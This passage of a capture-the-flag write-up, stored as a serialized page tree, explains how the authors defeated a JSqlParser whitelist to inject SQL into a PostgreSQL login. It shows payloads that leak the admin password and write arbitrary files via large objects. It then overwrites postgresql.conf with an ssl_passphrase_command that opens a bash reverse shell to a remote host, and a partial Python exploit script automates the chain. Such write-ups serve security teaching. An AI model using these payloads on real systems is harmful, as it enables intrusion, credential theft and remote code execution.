At the end of the recursion, if one of the two parts does not respect the whitelisted types then the query is not accepted.",{"type":33,"tag":47,"props":27360,"children":27361},{},[27362],{"type":38,"value":27363},"The whitelisted types are:",{"type":33,"tag":114,"props":27365,"children":27366},{"lang":25649},[27367],{"type":33,"tag":119,"props":27368,"children":27371},{"code":27369,"language":25649,"meta":8,"className":27370,"style":8},"LongValue\nStringValue\nNullValue\nTimeValue\nTimestampValue\nDateValue\nDoubleValue\nColumn\n","language-txt shiki shiki-themes vitesse-dark",[27372],{"type":33,"tag":105,"props":27373,"children":27374},{"__ignoreMap":8},[27375,27383,27391,27399,27407,27415,27423,27431],{"type":33,"tag":128,"props":27376,"children":27377},{"class":130,"line":131},[27378],{"type":33,"tag":128,"props":27379,"children":27380},{},[27381],{"type":38,"value":27382},"LongValue\n",{"type":33,"tag":128,"props":27384,"children":27385},{"class":130,"line":362},[27386],{"type":33,"tag":128,"props":27387,"children":27388},{},[27389],{"type":38,"value":27390},"StringValue\n",{"type":33,"tag":128,"props":27392,"children":27393},{"class":130,"line":403},[27394],{"type":33,"tag":128,"props":27395,"children":27396},{},[27397],{"type":38,"value":27398},"NullValue\n",{"type":33,"tag":128,"props":27400,"children":27401},{"class":130,"line":739},[27402],{"type":33,"tag":128,"props":27403,"children":27404},{},[27405],{"type":38,"value":27406},"TimeValue\n",{"type":33,"tag":128,"props":27408,"children":27409},{"class":130,"line":765},[27410],{"type":33,"tag":128,"props":27411,"children":27412},{},[27413],{"type":38,"value":27414},"TimestampValue\n",{"type":33,"tag":128,"props":27416,"children":27417},{"class":130,"line":804},[27418],{"type":33,"tag":128,"props":27419,"children":27420},{},[27421],{"type":38,"value":27422},"DateValue\n",{"type":33,"tag":128,"props":27424,"children":27425},{"class":130,"line":839},[27426],{"type":33,"tag":128,"props":27427,"children":27428},
{},[27429],{"type":38,"value":27430},"DoubleValue\n",{"type":33,"tag":128,"props":27432,"children":27433},{"class":130,"line":848},[27434],{"type":33,"tag":128,"props":27435,"children":27436},{},[27437],{"type":38,"value":27438},"Column\n",{"type":33,"tag":47,"props":27440,"children":27441},{},[27442,27444,27450,27452,27458],{"type":38,"value":27443},"Spoiler, the function ",{"type":33,"tag":105,"props":27445,"children":27447},{"className":27446},[],[27448],{"type":38,"value":27449},"query_to_xml",{"type":38,"value":27451}," returns a ",{"type":33,"tag":105,"props":27453,"children":27455},{"className":27454},[],[27456],{"type":38,"value":27457},"Function",{"type":38,"value":27459}," type. So we need to trick the filter into believing that the returned object is of an allowed type.",{"type":33,"tag":47,"props":27461,"children":27462},{},[27463,27465,27471,27472,27478,27480,27485],{"type":38,"value":27464},"The left and right parts are determined by the ",{"type":33,"tag":105,"props":27466,"children":27468},{"className":27467},[],[27469],{"type":38,"value":27470},"getLeft",{"type":38,"value":6345},{"type":33,"tag":105,"props":27473,"children":27475},{"className":27474},[],[27476],{"type":38,"value":27477},"getRight",{"type":38,"value":27479}," functions of the library ",{"type":33,"tag":105,"props":27481,"children":27483},{"className":27482},[],[27484],{"type":38,"value":26920},{"type":38,"value":215},{"type":33,"tag":47,"props":27487,"children":27488},{},[27489],{"type":38,"value":27490},"For example if we submit the following query:",{"type":33,"tag":114,"props":27492,"children":27493},{"lang":25649},[27494],{"type":33,"tag":119,"props":27495,"children":27497},{"code":27496},"username=a'||'b'||'c'||'d&passwd=a\n",[27498],{"type":33,"tag":105,"props":27499,"children":27500},{"__ignoreMap":8},[27501],{"type":38,"value":27496},{"type":33,"tag":47,"props":27503,"children":27504},{},[27505,27507,27512,27514,27520],{"type":38,"value":27506},"If we add a bit of debugging, we 
can see that at the end of the recursion, the left part will be ",{"type":33,"tag":105,"props":27508,"children":27510},{"className":27509},[],[27511],{"type":38,"value":53},{"type":38,"value":27513}," and the right part will be ",{"type":33,"tag":105,"props":27515,"children":27517},{"className":27516},[],[27518],{"type":38,"value":27519},"b",{"type":38,"value":27521},". It means that c and d are not processed by the check function.",{"type":33,"tag":114,"props":27523,"children":27524},{"lang":25649},[27525],{"type":33,"tag":119,"props":27526,"children":27528},{"code":27527,"language":25649,"meta":8,"className":27370,"style":8},"app-1  | [SQLParser.restrictExpr] left_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\napp-1  | [SQLParser.restrictExpr] left_expr: 'A'\napp-1  | [SQLParser.restrictExpr] right_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\napp-1  | [SQLParser.restrictExpr] right_expr: 'B'\napp-1  | [SQLParser.processSelect] expression: USERNAME = 'A' || 'B' || 'C' || 'D'\n",[27529],{"type":33,"tag":105,"props":27530,"children":27531},{"__ignoreMap":8},[27532,27540,27548,27556,27564],{"type":33,"tag":128,"props":27533,"children":27534},{"class":130,"line":131},[27535],{"type":33,"tag":128,"props":27536,"children":27537},{},[27538],{"type":38,"value":27539},"app-1  | [SQLParser.restrictExpr] left_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\n",{"type":33,"tag":128,"props":27541,"children":27542},{"class":130,"line":362},[27543],{"type":33,"tag":128,"props":27544,"children":27545},{},[27546],{"type":38,"value":27547},"app-1  | [SQLParser.restrictExpr] left_expr: 'A'\n",{"type":33,"tag":128,"props":27549,"children":27550},{"class":130,"line":403},[27551],{"type":33,"tag":128,"props":27552,"children":27553},{},[27554],{"type":38,"value":27555},"app-1  | [SQLParser.restrictExpr] right_expr.getClass(): class 
net.sf.jsqlparser.expression.StringValue\n",{"type":33,"tag":128,"props":27557,"children":27558},{"class":130,"line":739},[27559],{"type":33,"tag":128,"props":27560,"children":27561},{},[27562],{"type":38,"value":27563},"app-1  | [SQLParser.restrictExpr] right_expr: 'B'\n",{"type":33,"tag":128,"props":27565,"children":27566},{"class":130,"line":765},[27567],{"type":33,"tag":128,"props":27568,"children":27569},{},[27570],{"type":38,"value":27571},"app-1  | [SQLParser.processSelect] expression: USERNAME = 'A' || 'B' || 'C' || 'D'\n",{"type":33,"tag":47,"props":27573,"children":27574},{},[27575,27577,27583],{"type":38,"value":27576},"And we can see that both parts are indeed of type ",{"type":33,"tag":105,"props":27578,"children":27580},{"className":27579},[],[27581],{"type":38,"value":27582},"StringValue",{"type":38,"value":215},{"type":33,"tag":47,"props":27585,"children":27586},{},[27587],{"type":38,"value":27588},"So we can inject what we want in the right part provided it's concatenated with a string like this:",{"type":33,"tag":114,"props":27590,"children":27591},{"lang":25649},[27592],{"type":33,"tag":119,"props":27593,"children":27595},{"code":27594},"username=a'||'b'||INJECTION||'&passwd=a\n",[27596],{"type":33,"tag":105,"props":27597,"children":27598},{"__ignoreMap":8},[27599],{"type":38,"value":27594},{"type":33,"tag":47,"props":27601,"children":27602},{},[27603,27605,27611],{"type":38,"value":27604},"We can try with a simple injection like ",{"type":33,"tag":105,"props":27606,"children":27608},{"className":27607},[],[27609],{"type":38,"value":27610},"Select 
1",{"type":38,"value":284},{"type":33,"tag":114,"props":27613,"children":27614},{"lang":25649},[27615],{"type":33,"tag":119,"props":27616,"children":27618},{"code":27617},"username=a'||'b'||query_to_xml(chr(115)||chr(101)||chr(108)||chr(101)||chr(99)||chr(116)||chr(32)||chr(49),true,true,'')||'&passwd=a\n",[27619],{"type":33,"tag":105,"props":27620,"children":27621},{"__ignoreMap":8},[27622],{"type":38,"value":27617},{"type":33,"tag":47,"props":27624,"children":27625},{},[27626],{"type":38,"value":27627},"We can see in the logs that the query is accepted by the filter.",{"type":33,"tag":114,"props":27629,"children":27630},{"lang":25649},[27631],{"type":33,"tag":119,"props":27632,"children":27634},{"code":27633,"language":25649,"meta":8,"className":27370,"style":8},"app-1  | [SQLParser.restrictExpr] left_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\napp-1  | [SQLParser.restrictExpr] left_expr: 'A'\napp-1  | [SQLParser.restrictExpr] right_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\napp-1  | [SQLParser.restrictExpr] right_expr: 'B'\napp-1  | [SQLParser.processSelect] expression: USERNAME = 'A' || 'B' || QUERY_TO_XML(CHR(115) || CHR(101) || CHR(108) || CHR(101) || CHR(99) || CHR(116) || CHR(32) || CHR(49), TRUE, TRUE, '') || 
''\n",[27635],{"type":33,"tag":105,"props":27636,"children":27637},{"__ignoreMap":8},[27638,27645,27652,27659,27666],{"type":33,"tag":128,"props":27639,"children":27640},{"class":130,"line":131},[27641],{"type":33,"tag":128,"props":27642,"children":27643},{},[27644],{"type":38,"value":27539},{"type":33,"tag":128,"props":27646,"children":27647},{"class":130,"line":362},[27648],{"type":33,"tag":128,"props":27649,"children":27650},{},[27651],{"type":38,"value":27547},{"type":33,"tag":128,"props":27653,"children":27654},{"class":130,"line":403},[27655],{"type":33,"tag":128,"props":27656,"children":27657},{},[27658],{"type":38,"value":27555},{"type":33,"tag":128,"props":27660,"children":27661},{"class":130,"line":739},[27662],{"type":33,"tag":128,"props":27663,"children":27664},{},[27665],{"type":38,"value":27563},{"type":33,"tag":128,"props":27667,"children":27668},{"class":130,"line":765},[27669],{"type":33,"tag":128,"props":27670,"children":27671},{},[27672],{"type":38,"value":27673},"app-1  | [SQLParser.processSelect] expression: USERNAME = 'A' || 'B' || QUERY_TO_XML(CHR(115) || CHR(101) || CHR(108) || CHR(101) || CHR(99) || CHR(116) || CHR(32) || CHR(49), TRUE, TRUE, '') || ''\n",{"type":33,"tag":47,"props":27675,"children":27676},{},[27677],{"type":38,"value":27678},"On the return of the request we can also see we don't have any error message telling us that the query is not accepted. 
So we can say that the query is accepted by the filter.",{"type":33,"tag":75,"props":27680,"children":27682},{"imgSrc":27681},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559128/writeups/chatter-box/sqli_ok.webp",[],{"type":33,"tag":40,"props":27684,"children":27686},{"id":27685},"from-postgresqli-to-rce-unintended",[27687],{"type":38,"value":27688},"From postgreSQLI to RCE [UNINTENDED]",{"type":33,"tag":47,"props":27690,"children":27691},{},[27692],{"type":38,"value":27693},"Now we can easily leak the password of the admin user through a visible SQL error, with a payload like this:",{"type":33,"tag":114,"props":27695,"children":27696},{"lang":25649},[27697],{"type":33,"tag":119,"props":27698,"children":27700},{"code":27699},"(SELECT CAST((SELECT passwd FROM message_users LIMIT 1) AS int))\n",[27701],{"type":33,"tag":105,"props":27702,"children":27703},{"__ignoreMap":8},[27704],{"type":38,"value":27699},{"type":33,"tag":47,"props":27706,"children":27707},{},[27708,27710,27716,27717,27723],{"type":38,"value":27709},"But after several hours of research on the other controllers (",{"type":33,"tag":105,"props":27711,"children":27713},{"className":27712},[],[27714],{"type":38,"value":27715},"NotifyController",{"type":38,"value":6345},{"type":33,"tag":105,"props":27718,"children":27720},{"className":27719},[],[27721],{"type":38,"value":27722},"MessageBoardController",{"type":38,"value":27724},"). We were not able to go further. 
So we thought that these controllers were rabbit-holes.",{"type":33,"tag":47,"props":27726,"children":27727},{},[27728],{"type":38,"value":27729},"So we tried to research how to deepen the SQL injection in order to execute code on the server.",{"type":33,"tag":47,"props":27731,"children":27732},{},[27733],{"type":38,"value":27734},"So now we can ask ourselves, from a select statement in postgresql how can we interact with the server in order to compromise it and execute code?",{"type":33,"tag":81,"props":27736,"children":27738},{"id":27737},"arbitrary-file-write-read",[27739],{"type":38,"value":27740},"Arbitrary file write / read",{"type":33,"tag":47,"props":27742,"children":27743},{},[27744],{"type":38,"value":27745},"PostgreSQL's large object facility offers stream-style access to user data stored in a specialized large-object structure. This streaming access proves valuable when dealing with data values that are impractical to manipulate as a complete entity due to their size.",{"type":33,"tag":47,"props":27747,"children":27748},{},[27749],{"type":38,"value":27750},"Thus, we can read and write files on the server using large objects.",{"type":33,"tag":47,"props":27752,"children":27753},{},[27754,27756,27762,27764,27769],{"type":38,"value":27755},"Unfortunately, the postgres user of the docker does not have the necessary rights to read the ",{"type":33,"tag":105,"props":27757,"children":27759},{"className":27758},[],[27760],{"type":38,"value":27761},"/flag",{"type":38,"value":27763}," file, so we must at all costs execute the elf ",{"type":33,"tag":105,"props":27765,"children":27767},{"className":27766},[],[27768],{"type":38,"value":5294},{"type":38,"value":215},{"type":33,"tag":47,"props":27771,"children":27772},{},[27773],{"type":38,"value":27774},"So we will focus on how to write files to the server:",{"type":33,"tag":47,"props":27776,"children":27777},{},[27778,27780,27786,27788,27794],{"type":38,"value":27779},"For this, we must use the 
",{"type":33,"tag":105,"props":27781,"children":27783},{"className":27782},[],[27784],{"type":38,"value":27785},"lo_frombytea",{"type":38,"value":27787}," function, which allows writing to a large postgresql object and finally call the ",{"type":33,"tag":105,"props":27789,"children":27791},{"className":27790},[],[27792],{"type":38,"value":27793},"lo_export",{"type":38,"value":27795}," function with the path that allows writing the large object to the server disk.",{"type":33,"tag":114,"props":27797,"children":27798},{"lang":8},[27799],{"type":33,"tag":119,"props":27800,"children":27802},{"code":27801},"SELECT lo_from_bytea(10000, decode('cHduZWQK', 'base64'))\nSELECT lo_export(10000, '/tmp/pwn')\n",[27803],{"type":33,"tag":105,"props":27804,"children":27805},{"__ignoreMap":8},[27806],{"type":38,"value":27801},{"type":33,"tag":47,"props":27808,"children":27809},{},[27810],{"type":38,"value":27811},"Note that both functions take as a first parameter an identifier, allowing to identify a large object, it is possible to put any identifier as long as it is not already used.",{"type":33,"tag":47,"props":27813,"children":27814},{},[27815],{"type":38,"value":27816},"After executing these two functions, we can see that the /tmp/pwn file has been successfully created with its content",{"type":33,"tag":75,"props":27818,"children":27820},{"imgSrc":27819,":width":1862},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559178/writeups/chatter-box/file_write_pwn.webp",[],{"type":33,"tag":47,"props":27822,"children":27823},{},[27824],{"type":38,"value":27825},"We now have a POC that allows writing files to the system. 
Also note that these functions can also allow rewriting a file already created.",{"type":33,"tag":81,"props":27827,"children":27829},{"id":27828},"postgresqlconf",[27830],{"type":38,"value":8844},{"type":33,"tag":47,"props":27832,"children":27833},{},[27834,27836,27841],{"type":38,"value":27835},"Once we have been able to rewrite files, we may ask ourselves which file would be interesting to rewrite? The ",{"type":33,"tag":105,"props":27837,"children":27839},{"className":27838},[],[27840],{"type":38,"value":8844},{"type":38,"value":27842}," file of course !!",{"type":33,"tag":47,"props":27844,"children":27845},{},[27846],{"type":38,"value":27847},"An interesting option in the postgresql configuration is the \"ssl_passphrase_command\" option.",{"type":33,"tag":75,"props":27849,"children":27851},{"imgSrc":27850,":width":1862},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559212/writeups/chatter-box/doc_passphrase_command.webp",[],{"type":33,"tag":47,"props":27853,"children":27854},{},[27855],{"type":38,"value":27856},"This option allows to execute a command if the ssl key is encrypted with a passphrase.",{"type":33,"tag":47,"props":27858,"children":27859},{},[27860],{"type":38,"value":27861},"We must therefore generate a new key that includes a passphrase, so we will use the following command:",{"type":33,"tag":114,"props":27863,"children":27864},{"lang":116},[27865],{"type":33,"tag":119,"props":27866,"children":27868},{"code":27867,"language":116,"meta":8,"className":121,"style":8},"openssl rsa -aes256 -in /etc/ssl/private/ssl-cert-snakeoil.key -out 
./my_new_key\n",[27869],{"type":33,"tag":105,"props":27870,"children":27871},{"__ignoreMap":8},[27872],{"type":33,"tag":128,"props":27873,"children":27874},{"class":130,"line":131},[27875,27880,27885,27890,27895,27900,27905],{"type":33,"tag":128,"props":27876,"children":27877},{"style":135},[27878],{"type":38,"value":27879},"openssl",{"type":33,"tag":128,"props":27881,"children":27882},{"style":140},[27883],{"type":38,"value":27884}," rsa",{"type":33,"tag":128,"props":27886,"children":27887},{"style":151},[27888],{"type":38,"value":27889}," -aes256",{"type":33,"tag":128,"props":27891,"children":27892},{"style":151},[27893],{"type":38,"value":27894}," -in",{"type":33,"tag":128,"props":27896,"children":27897},{"style":140},[27898],{"type":38,"value":27899}," /etc/ssl/private/ssl-cert-snakeoil.key",{"type":33,"tag":128,"props":27901,"children":27902},{"style":151},[27903],{"type":38,"value":27904}," -out",{"type":33,"tag":128,"props":27906,"children":27907},{"style":140},[27908],{"type":38,"value":27909}," ./my_new_key\n",{"type":33,"tag":47,"props":27911,"children":27912},{},[27913],{"type":38,"value":27914},"Result of the command:",{"type":33,"tag":75,"props":27916,"children":27918},{"imgSrc":27917},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559241/writeups/chatter-box/rsa_command.webp",[],{"type":33,"tag":47,"props":27920,"children":27921},{},[27922],{"type":38,"value":27923},"Once our key is generated, we must find a file to rewrite with 600 rights. 
If our file containing the key does not have these rights then the server will not accept it and will raise an exception.",{"type":33,"tag":47,"props":27925,"children":27926},{},[27927],{"type":38,"value":27928},"To search for these specific files we use the following command:",{"type":33,"tag":114,"props":27930,"children":27931},{"lang":116},[27932],{"type":33,"tag":119,"props":27933,"children":27935},{"code":27934,"language":116,"meta":8,"className":121,"style":8},"find /var/lib/postgresql/13/ -type f -perm 600 -user postgres -writable 2>&-\n",[27936],{"type":33,"tag":105,"props":27937,"children":27938},{"__ignoreMap":8},[27939],{"type":33,"tag":128,"props":27940,"children":27941},{"class":130,"line":131},[27942,27947,27952,27957,27961,27966,27970,27975,27979,27984,27989],{"type":33,"tag":128,"props":27943,"children":27944},{"style":135},[27945],{"type":38,"value":27946},"find",{"type":33,"tag":128,"props":27948,"children":27949},{"style":140},[27950],{"type":38,"value":27951}," /var/lib/postgresql/13/",{"type":33,"tag":128,"props":27953,"children":27954},{"style":151},[27955],{"type":38,"value":27956}," -type",{"type":33,"tag":128,"props":27958,"children":27959},{"style":140},[27960],{"type":38,"value":10534},{"type":33,"tag":128,"props":27962,"children":27963},{"style":151},[27964],{"type":38,"value":27965}," -perm",{"type":33,"tag":128,"props":27967,"children":27968},{"style":523},[27969],{"type":38,"value":7683},{"type":33,"tag":128,"props":27971,"children":27972},{"style":151},[27973],{"type":38,"value":27974}," -user",{"type":33,"tag":128,"props":27976,"children":27977},{"style":140},[27978],{"type":38,"value":8702},{"type":33,"tag":128,"props":27980,"children":27981},{"style":151},[27982],{"type":38,"value":27983}," -writable",{"type":33,"tag":128,"props":27985,"children":27986},{"style":300},[27987],{"type":38,"value":27988}," 
2>&",{"type":33,"tag":128,"props":27990,"children":27991},{"style":140},[27992],{"type":38,"value":27993},"-\n",{"type":33,"tag":47,"props":27995,"children":27996},{},[27997],{"type":38,"value":27914},{"type":33,"tag":75,"props":27999,"children":28001},{"imgSrc":28000},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559268/writeups/chatter-box/find_command.webp",[],{"type":33,"tag":47,"props":28003,"children":28004},{},[28005,28007,28013],{"type":38,"value":28006},"So the most interesting file in our case is the ",{"type":33,"tag":105,"props":28008,"children":28010},{"className":28009},[],[28011],{"type":38,"value":28012},"PG_VERSION",{"type":38,"value":28014}," file. After our upload it will contain the content of our key.",{"type":33,"tag":47,"props":28016,"children":28017},{},[28018],{"type":38,"value":28019},"Our postgresql configuration will be as follows:",{"type":33,"tag":114,"props":28021,"children":28022},{"lang":8945},[28023],{"type":33,"tag":119,"props":28024,"children":28026},{"code":28025,"language":8945,"meta":8,"className":8949,"style":8},"# - SSL -\n\nssl = on\nssl_cert_file = '/etc/ssl/certs/ssl-cert-snakeoil.pem'\nssl_key_file = '/var/lib/postgresql/13/main/PG_VERSION'\nssl_passphrase_command_supports_reload = on\nssl_passphrase_command = '/bin/bash -c \"/bin/bash -i >& /dev/tcp/IP/9999 0>&1\"'\n",[28027],{"type":33,"tag":105,"props":28028,"children":28029},{"__ignoreMap":8},[28030,28038,28045,28053,28061,28069,28077],{"type":33,"tag":128,"props":28031,"children":28032},{"class":130,"line":131},[28033],{"type":33,"tag":128,"props":28034,"children":28035},{},[28036],{"type":38,"value":28037},"# - SSL 
-\n",{"type":33,"tag":128,"props":28039,"children":28040},{"class":130,"line":362},[28041],{"type":33,"tag":128,"props":28042,"children":28043},{"emptyLinePlaceholder":896},[28044],{"type":38,"value":899},{"type":33,"tag":128,"props":28046,"children":28047},{"class":130,"line":403},[28048],{"type":33,"tag":128,"props":28049,"children":28050},{},[28051],{"type":38,"value":28052},"ssl = on\n",{"type":33,"tag":128,"props":28054,"children":28055},{"class":130,"line":739},[28056],{"type":33,"tag":128,"props":28057,"children":28058},{},[28059],{"type":38,"value":28060},"ssl_cert_file = '/etc/ssl/certs/ssl-cert-snakeoil.pem'\n",{"type":33,"tag":128,"props":28062,"children":28063},{"class":130,"line":765},[28064],{"type":33,"tag":128,"props":28065,"children":28066},{},[28067],{"type":38,"value":28068},"ssl_key_file = '/var/lib/postgresql/13/main/PG_VERSION'\n",{"type":33,"tag":128,"props":28070,"children":28071},{"class":130,"line":804},[28072],{"type":33,"tag":128,"props":28073,"children":28074},{},[28075],{"type":38,"value":28076},"ssl_passphrase_command_supports_reload = on\n",{"type":33,"tag":128,"props":28078,"children":28079},{"class":130,"line":839},[28080],{"type":33,"tag":128,"props":28081,"children":28082},{},[28083],{"type":38,"value":28084},"ssl_passphrase_command = '/bin/bash -c \"/bin/bash -i >& /dev/tcp/IP/9999 0>&1\"'\n",{"type":33,"tag":47,"props":28086,"children":28087},{},[28088],{"type":38,"value":28089},"Once our configuration is uploaded, we will need to reload the postgresql configuration. 
To do this, we call the pg_reload_conf() function, which makes the server re-read postgresql.conf and apply the new settings. Note that pg_reload_conf() and the server-side lo_export() used above are restricted to superusers by default (other roles need an explicit EXECUTE grant), so this whole chain only works because the web application's database role is highly privileged.",{"type":33,"tag":40,"props":28091,"children":28092},{"id":21053},[28093],{"type":38,"value":21056},{"type":33,"tag":47,"props":28095,"children":28096},{},[28097],{"type":38,"value":28098},"So to get our RCE we are going to do this step by step:",{"type":33,"tag":239,"props":28100,"children":28101},{},[28102],{"type":33,"tag":243,"props":28103,"children":28104},{},[28105],{"type":38,"value":28106},"Upload the malicious configuration:",{"type":33,"tag":114,"props":28108,"children":28109},{"lang":10227},[28110],{"type":33,"tag":119,"props":28111,"children":28113},{"code":28112,"language":10227,"meta":8,"className":10231,"style":8},"rand_num = random.randint(31337, 31337*5)\n    \nwith open(\"files/conf.b64\", \"r\") as f:\n    conf = f.read()\n\nquery = get_payload(f\"(SELECT lo_from_bytea({rand_num}, decode('{conf}', 'base64')))\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\nquery = get_payload(f\"(SELECT lo_export({rand_num}, '/etc/postgresql/13/main/postgresql.conf'))\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\n",[28114],{"type":33,"tag":105,"props":28115,"children":28116},{"__ignoreMap":8},[28117,28170,28177,28238,28265,28272,28339,28442,28491],{"type":33,"tag":128,"props":28118,"children":28119},{"class":130,"line":131},[28120,28125,28129,28133,28137,28141,28145,28150,28154,28158,28162,28166],{"type":33,"tag":128,"props":28121,"children":28122},{"style":323},[28123],{"type":38,"value":28124},"rand_num 
",{"type":33,"tag":128,"props":28126,"children":28127},{"style":312},[28128],{"type":38,"value":315},{"type":33,"tag":128,"props":28130,"children":28131},{"style":323},[28132],{"type":38,"value":10424},{"type":33,"tag":128,"props":28134,"children":28135},{"style":312},[28136],{"type":38,"value":215},{"type":33,"tag":128,"props":28138,"children":28139},{"style":323},[28140],{"type":38,"value":10433},{"type":33,"tag":128,"props":28142,"children":28143},{"style":312},[28144],{"type":38,"value":5566},{"type":33,"tag":128,"props":28146,"children":28147},{"style":523},[28148],{"type":38,"value":28149},"31337",{"type":33,"tag":128,"props":28151,"children":28152},{"style":312},[28153],{"type":38,"value":5584},{"type":33,"tag":128,"props":28155,"children":28156},{"style":523},[28157],{"type":38,"value":10451},{"type":33,"tag":128,"props":28159,"children":28160},{"style":300},[28161],{"type":38,"value":9683},{"type":33,"tag":128,"props":28163,"children":28164},{"style":523},[28165],{"type":38,"value":10460},{"type":33,"tag":128,"props":28167,"children":28168},{"style":312},[28169],{"type":38,"value":2427},{"type":33,"tag":128,"props":28171,"children":28172},{"class":130,"line":362},[28173],{"type":33,"tag":128,"props":28174,"children":28175},{"style":323},[28176],{"type":38,"value":10680},{"type":33,"tag":128,"props":28178,"children":28179},{"class":130,"line":403},[28180,28185,28189,28193,28197,28202,28206,28210,28214,28218,28222,28226,28230,28234],{"type":33,"tag":128,"props":28181,"children":28182},{"style":1576},[28183],{"type":38,"value":28184},"with",{"type":33,"tag":128,"props":28186,"children":28187},{"style":437},[28188],{"type":38,"value":10725},{"type":33,"tag":128,"props":28190,"children":28191},{"style":312},[28192],{"type":38,"value":5566},{"type":33,"tag":128,"props":28194,"children":28195},{"style":676},[28196],{"type":38,"value":669},{"type":33,"tag":128,"props":28198,"children":28199},{"style":140},[28200],{"type":38,"value":28201},"files/conf.b64",{"type":3
3,"tag":128,"props":28203,"children":28204},{"style":676},[28205],{"type":38,"value":669},{"type":33,"tag":128,"props":28207,"children":28208},{"style":312},[28209],{"type":38,"value":5584},{"type":33,"tag":128,"props":28211,"children":28212},{"style":676},[28213],{"type":38,"value":679},{"type":33,"tag":128,"props":28215,"children":28216},{"style":140},[28217],{"type":38,"value":10916},{"type":33,"tag":128,"props":28219,"children":28220},{"style":676},[28221],{"type":38,"value":669},{"type":33,"tag":128,"props":28223,"children":28224},{"style":312},[28225],{"type":38,"value":2966},{"type":33,"tag":128,"props":28227,"children":28228},{"style":1576},[28229],{"type":38,"value":10759},{"type":33,"tag":128,"props":28231,"children":28232},{"style":323},[28233],{"type":38,"value":10534},{"type":33,"tag":128,"props":28235,"children":28236},{"style":312},[28237],{"type":38,"value":5318},{"type":33,"tag":128,"props":28239,"children":28240},{"class":130,"line":739},[28241,28245,28249,28253,28257,28261],{"type":33,"tag":128,"props":28242,"children":28243},{"style":323},[28244],{"type":38,"value":11219},{"type":33,"tag":128,"props":28246,"children":28247},{"style":312},[28248],{"type":38,"value":315},{"type":33,"tag":128,"props":28250,"children":28251},{"style":323},[28252],{"type":38,"value":10534},{"type":33,"tag":128,"props":28254,"children":28255},{"style":312},[28256],{"type":38,"value":215},{"type":33,"tag":128,"props":28258,"children":28259},{"style":323},[28260],{"type":38,"value":10810},{"type":33,"tag":128,"props":28262,"children":28263},{"style":312},[28264],{"type":38,"value":7857},{"type":33,"tag":128,"props":28266,"children":28267},{"class":130,"line":765},[28268],{"type":33,"tag":128,"props":28269,"children":28270},{"emptyLinePlaceholder":896},[28271],{"type":38,"value":899},{"type":33,"tag":128,"props":28273,"children":28274},{"class":130,"line":804},[28275,28280,28284,28288,28292,28296,28301,28305,28310,28314,28318,28322,28326,28330,28335],{"type":33,"tag":128,
"props":28276,"children":28277},{"style":323},[28278],{"type":38,"value":28279},"query ",{"type":33,"tag":128,"props":28281,"children":28282},{"style":312},[28283],{"type":38,"value":315},{"type":33,"tag":128,"props":28285,"children":28286},{"style":323},[28287],{"type":38,"value":25709},{"type":33,"tag":128,"props":28289,"children":28290},{"style":312},[28291],{"type":38,"value":5566},{"type":33,"tag":128,"props":28293,"children":28294},{"style":300},[28295],{"type":38,"value":11107},{"type":33,"tag":128,"props":28297,"children":28298},{"style":140},[28299],{"type":38,"value":28300},"\"(SELECT lo_from_bytea(",{"type":33,"tag":128,"props":28302,"children":28303},{"style":151},[28304],{"type":38,"value":7246},{"type":33,"tag":128,"props":28306,"children":28307},{"style":323},[28308],{"type":38,"value":28309},"rand_num",{"type":33,"tag":128,"props":28311,"children":28312},{"style":151},[28313],{"type":38,"value":5730},{"type":33,"tag":128,"props":28315,"children":28316},{"style":140},[28317],{"type":38,"value":11130},{"type":33,"tag":128,"props":28319,"children":28320},{"style":151},[28321],{"type":38,"value":7246},{"type":33,"tag":128,"props":28323,"children":28324},{"style":323},[28325],{"type":38,"value":8945},{"type":33,"tag":128,"props":28327,"children":28328},{"style":151},[28329],{"type":38,"value":5730},{"type":33,"tag":128,"props":28331,"children":28332},{"style":140},[28333],{"type":38,"value":28334},"', 'base64')))\"",{"type":33,"tag":128,"props":28336,"children":28337},{"style":312},[28338],{"type":38,"value":2427},{"type":33,"tag":128,"props":28340,"children":28341},{"class":130,"line":839},[28342,28347,28351,28355,28359,28363,28367,28372,28376,28380,28384,28388,28393,28397,28401,28405,28409,28413,28418,28422,28426,28430,28434,28438],{"type":33,"tag":128,"props":28343,"children":28344},{"style":323},[28345],{"type":38,"value":28346},"r 
",{"type":33,"tag":128,"props":28348,"children":28349},{"style":312},[28350],{"type":38,"value":315},{"type":33,"tag":128,"props":28352,"children":28353},{"style":323},[28354],{"type":38,"value":10587},{"type":33,"tag":128,"props":28356,"children":28357},{"style":312},[28358],{"type":38,"value":215},{"type":33,"tag":128,"props":28360,"children":28361},{"style":323},[28362],{"type":38,"value":5561},{"type":33,"tag":128,"props":28364,"children":28365},{"style":312},[28366],{"type":38,"value":5566},{"type":33,"tag":128,"props":28368,"children":28369},{"style":151},[28370],{"type":38,"value":28371},"URL_TARGET",{"type":33,"tag":128,"props":28373,"children":28374},{"style":312},[28375],{"type":38,"value":5584},{"type":33,"tag":128,"props":28377,"children":28378},{"style":306},[28379],{"type":38,"value":13545},{"type":33,"tag":128,"props":28381,"children":28382},{"style":312},[28383],{"type":38,"value":315},{"type":33,"tag":128,"props":28385,"children":28386},{"style":676},[28387],{"type":38,"value":669},{"type":33,"tag":128,"props":28389,"children":28390},{"style":140},[28391],{"type":38,"value":28392},"username=",{"type":33,"tag":128,"props":28394,"children":28395},{"style":676},[28396],{"type":38,"value":669},{"type":33,"tag":128,"props":28398,"children":28399},{"style":300},[28400],{"type":38,"value":25605},{"type":33,"tag":128,"props":28402,"children":28403},{"style":323},[28404],{"type":38,"value":5810},{"type":33,"tag":128,"props":28406,"children":28407},{"style":300},[28408],{"type":38,"value":25605},{"type":33,"tag":128,"props":28410,"children":28411},{"style":676},[28412],{"type":38,"value":669},{"type":33,"tag":128,"props":28414,"children":28415},{"style":140},[28416],{"type":38,"value":28417},"&passwd=admin",{"type":33,"tag":128,"props":28419,"children":28420},{"style":676},[28421]